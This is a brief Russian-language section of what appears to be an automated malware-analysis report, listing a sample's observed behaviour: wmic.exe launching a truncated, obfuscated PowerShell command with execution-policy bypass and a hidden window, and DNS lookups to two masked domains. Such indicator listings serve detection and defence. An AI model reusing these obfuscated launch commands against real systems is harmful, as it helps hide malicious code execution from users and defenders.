Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' "PrOCess" CALL CreaTe "pOWershELl -nOnIntERACTI -EXEcut bypaSS -WIn 000000000000000001 $J0P =([CHar]34).ToStrINg() ;SV 0L4 (([ChAr]44).ToStriNG() ) ; "\" `${0`Ai}= [type](${J0P...
- DNS ASK go###tto.com
- DNS ASK xo###tto.com
- '<SYSTEM32>\wbem\wmic.exe' "PrOCess" CALL CreaTe "pOWershELl -nOnIntERACTI -EXEcut bypaSS -WIn 000000000000000001 $J0P =([CHar]34).ToStrINg() ;SV 0L4 (([ChAr]44).ToStriNG() ) ; "\" `${0`Ai}= [type](${J0P...' (со скрытым окном)